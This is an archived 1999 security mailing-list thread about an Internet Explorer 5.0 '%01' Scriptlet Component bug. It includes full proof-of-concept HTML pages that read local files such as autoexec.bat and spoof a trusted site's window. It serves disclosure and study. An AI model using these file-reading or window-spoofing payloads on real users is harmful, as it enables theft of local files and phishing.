Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

msie.5.0-0.001.percent.txt

🗓️ 17 Aug 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Security bug in Internet Explorer 5.0 bypasses Cross-frame security, allows file reading and spoofing.

Code
`Date: Fri, 9 Apr 1999 07:15:12 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: IE 5.0 security vulnerabilities - %01 bug again  
  
There is a security bug in Internet Explorer 5.0 which circumvents  
"Cross-frame security" and opens several security holes.  
  
This is a modification of the "%01 security bug" (that was fixed in IE  
5.0) I found in January.  
  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet  
Component", IE thinks that the document is loaded from the domain of 'someURL'.  
  
Some of the vulnerabilities are:  
  
1) IE allows reading local files and sending them to an arbitrary server.  
The filename must be known.  
  
The bug may be exploited using HTML mail message.  
  
Demo is available at: http://www.nat.bg/~joro/scriptlet.html  
  
2) IE allows "window spoofing".  
After visiting a hostile page (or clicking a hostile link) a window is  
opened and its location is a trusted site. However, the content of the   
window is not that of the original site, but it is supplied by the owner   
of the page. So, the user is misled he is browising a trusted site, while   
he is browsing a hostile page and may provide sensitive information,  
such as credit card number.  
  
The bug may be exploited using HTML mail message.  
  
Demo is available at: http://www.nat.bg/~joro/scrspoof.html  
  
  
Workaround: Disable Javascript  
  
Regards,  
Georgi Guninski  
  
----------------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/scriptlet.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - file reading  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates reading local files.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<SCRIPT>alert('Create a short file C:\\test.txt and it will be read and shown in a message box');a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();</SCRIPT>%01file://c:/">  
</OBJECT>  
</BODY>  
</HTML>  
  
----------------------------------------------------------------------------------  
  
[http://www.nat.bg/~joro/scrspoof.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - window spoofing  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates spoofing windows.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=http://www.nat.bg/~joro>Go to Georgi Guninski home page</A></H1></BODY></HTML>');</SCRIPT>%01http://www.yahoo.com">  
</OBJECT>  
</BODY>  
</HTML>  
  
----------------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 08:38:09 -0400  
From: Eric Stevens <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Is there any way to exploit this with files that are not recognized as text.  
Example, I tried modifying your code to c:\autoexec.bat and  
c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
file, I instead recieved an Open/Save As dialog. Open tries to execute the  
bat file or edit the ini file in the temp folder where it was downloaded,  
and save as does the obvious. This problem exists on both versions of IE5  
that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
exploited against anything but text files as it's not terribly likely that  
you have any sensitive information sitting around in text files whose names  
are likely to be guessed.  
  
----] quote [----  
>1) IE allows reading local files and sending them to an arbitrary  
>server.  
>The filename must be known.  
>  
>The bug may be exploited using HTML mail message.  
>  
----] end quote [----  
  
----------------------------------------------------------------------------------  
  
Date: Sat, 10 Apr 1999 20:51:47 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Eric Stevens wrote:  
>  
> Is there any way to exploit this with files that are not recognized as text.  
  
Yes, there is such a way. You must use TDC to read files with extensions  
different from .txt or .html.  
  
Demonstration of reading AUTOEXEC.BAT is available at:  
http://www.nat.bg/~joro/scrauto.html  
  
> Example, I tried modifying your code to c:\autoexec.bat and  
> c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
> file, I instead recieved an Open/Save As dialog. Open tries to execute the  
> bat file or edit the ini file in the temp folder where it was downloaded,  
> and save as does the obvious. This problem exists on both versions of IE5  
> that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
> 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
> exploited against anything but text files as it's not terribly likely that  
> you have any sensitive information sitting around in text files whose names  
> are likely to be guessed.  
>  
  
Regards,  
Georgi Guninski  
  
[http://www.nat.bg/~joro/scrauto.html]  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "%01" security vulnerability - reading AUTOEXEC.BAT  
</TITLE>  
</HEAD>  
  
  
<BODY>  
There is a security bug in Internet Explorer 5.0 which circumvents "Cross-frame security" and   
opens several security holes.  
<BR>  
This is a modification of the "%01 security bug" (that was fixed in IE 5.0) I found in January.  
<BR>  
The problem seems to be in the "Microsoft Scriptlet Component".  
If you add '%01someURL' after the URL you pass to "Microsoft Scriptlet Component", IE thinks that the document is   
loaded from the domain of 'someURL'.  
  
This page demonstrates reading AUTOEXEC.BAT.  
  
<BR>  
  
Workaround: Disable Javascript  
  
<BR>  
  
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>  
  
<OBJECT  
classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389"  
>  
<PARAM NAME="URL" value="about:<object id='myTDC' width=100 height=100 classid='CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83'><param name='DataURL' value='c:/autoexec.bat'><param name='UseHeader' value=False><param name='CharSet' VALUE='iso-8859-1'><param name='FieldDelim' value='}'><param name='RowDelim' value='}'><param name='TextQualifier' value='}'></object><form><textarea datasrc='#myTDC' datafld='Column1' rows=10 cols=80></textarea></form><SCRIPT>s='Here is your AUTOEXEC.BAT:\n\n';setTimeout('alert(s+document.forms[0].elements[0].value)',4000)</SCRIPT>%01file://c:/">  
</OBJECT>  
</BODY>  
</HTML>  
  
----------------------------------------------------------------------------------  
  
Date: Fri, 9 Apr 1999 15:05:07 -0700  
From: Ryan Russell <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Since it's an NT box, did you try using the ::$DATA  
feature in conjunction with this bug?  
  
Ryan  
  
  
  
  
  
  
Is there any way to exploit this with files that are not recognized as text.  
Example, I tried modifying your code to c:\autoexec.bat and  
c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
file, I instead recieved an Open/Save As dialog. Open tries to execute the  
bat file or edit the ini file in the temp folder where it was downloaded,  
and save as does the obvious. This problem exists on both versions of IE5  
that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
exploited against anything but text files as it's not terribly likely that  
you have any sensitive information sitting around in text files whose names  
are likely to be guessed.  
  
----------------------------------------------------------------------------------  
  
Date: Mon, 12 Apr 1999 22:59:36 -0700  
From: adam <[email protected]>  
To: [email protected]  
Subject: Re: IE 5.0 security vulnerabilities - %01 bug again  
  
Forgive me if this has been mentioned.  
  
The bug also exists on ie 4. A similar one is possible with netscape.  
  
On Sat, 10 Apr 1999, Georgi Guninski wrote:  
  
> Eric Stevens wrote:  
> >  
> > Is there any way to exploit this with files that are not recognized as text.  
>  
> Yes, there is such a way. You must use TDC to read files with extensions  
> different from .txt or .html.  
>  
> Demonstration of reading AUTOEXEC.BAT is available at:  
> http://www.nat.bg/~joro/scrauto.html  
>  
> > Example, I tried modifying your code to c:\autoexec.bat and  
> > c:\winnt\win.ini. Instead of displaying the contents of my autoexec.bat  
> > file, I instead recieved an Open/Save As dialog. Open tries to execute the  
> > bat file or edit the ini file in the temp folder where it was downloaded,  
> > and save as does the obvious. This problem exists on both versions of IE5  
> > that I have access to, 5.00.0708.700 [ships with Windows 2000 Beta 2 build  
> > 5.00.1877], and 5.00.2014.0216 [a public release]. Hopefully this can't be  
> > exploited against anything but text files as it's not terribly likely that  
> > you have any sensitive information sitting around in text files whose names  
> > are likely to be guessed.  
> >  
>  
> Regards,  
> Georgi Guninski  
>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
internet explorer securitycross-frame securityfile readingwindow spoofingjavascript workaround.
30